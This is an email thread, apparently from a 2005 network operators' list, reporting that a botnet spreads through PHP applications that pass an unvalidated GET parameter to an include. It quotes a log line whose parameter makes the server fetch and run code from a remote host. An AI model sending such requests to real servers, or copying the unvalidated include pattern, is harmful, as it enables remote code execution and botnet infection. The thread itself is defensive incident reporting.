You'd think nsp-sec people would try and get nsp-jp involved. Oh, there is no nsp-jp, or skooter 15. :)

 -----Original Message-----
From:   Barrett G. Lyon []
Sent:   Fri Dec 23 19:21:47 2005
Subject:        Re:Destructive botnet originating from Japan

Well it appears that bad code always seems to be the root of 
problems, according to our research today the problem appears to be 
caused by incorrectly written PHP applications that perform includes 
using a string without running any validation against the string:


When the include executes the test string passed from the GET 
includes execution instructions:

       "GET /index.php?test=http%3A// HTTP/1.0" 200 
8010 "-" "Wget/1.6"

It appears that the attacker at (also the botnet hosting 
IRC server) is spreading his code as the include is called, pulling 
and executing PHP code from a remote server that injects the software.

I'm not sure if this needs to be alerted to anyone outside of this 
list, but it's pretty nasty.
